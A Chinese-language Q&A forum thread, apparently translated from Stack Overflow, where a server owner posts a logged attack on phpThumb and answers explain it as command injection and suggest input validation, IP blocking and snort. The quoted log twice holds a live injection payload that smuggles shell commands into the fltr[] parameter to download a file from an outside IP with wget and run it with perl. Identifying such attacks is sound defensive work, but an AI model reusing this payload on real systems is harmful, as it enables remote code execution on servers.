我从攻击者那里得到错误我相信......他们想要做什么以及如何阻止他们?这是日志:
Monday 26th of December 2011 12:10:18 PM
src=file.jpg&fltr[]=blur|
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
91.121.133.22
| 39757
| /var/www/class.php
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
[src = file.jpg] - [fltr = Array] - [phpThumbDebug = 9] -
我已将区域分隔为新线条。大多数是输入,然后是服务器端口,他们的IP地址,他们访问的脚本。看起来他们试图使用漏洞来访问命令行。但这不是他们认为的剧本。
答案 0 :(得分:3)
Web服务器一直受到攻击。任何给定的攻击都试图挑选一个特定的程序。 如果您编写好软件并验证所有输入,那么您的系统应该能够容忍这样的垃圾,并礼貌地忽略它。 它不像DOS攻击,如果它每天只发生3次。 如果你想坚持下去,你可以写一个脚本来扫描日志,如果你看到一个已知的攻击模式,运行一个脚本来阻止ip在N次点击后进入你的网络服务器。
答案 1 :(得分:0)
看来在phpThumb的fltr []参数中有一个命令注入漏洞利用
http://www.securityfocus.com/bid/39605/exploit
http://www.juniper.net/security/auto/vulnerabilities/vuln39605.html
答案 2 :(得分:0)
如果所有攻击都来自同一个IP地址,那么您可以使用iptables阻止该IP访问您的服务器。您可以通过编写脚本暂时或永久地执行此操作。 此解决方案假定您具有root / sudo访问权限的托管服务器。 您还可以探索snort,它对已知(和常见)漏洞利用有效负载和字符串非常有效。
最后,在防止常见的基于Web的攻击方面,没有什么能够胜过稳固的输入验证!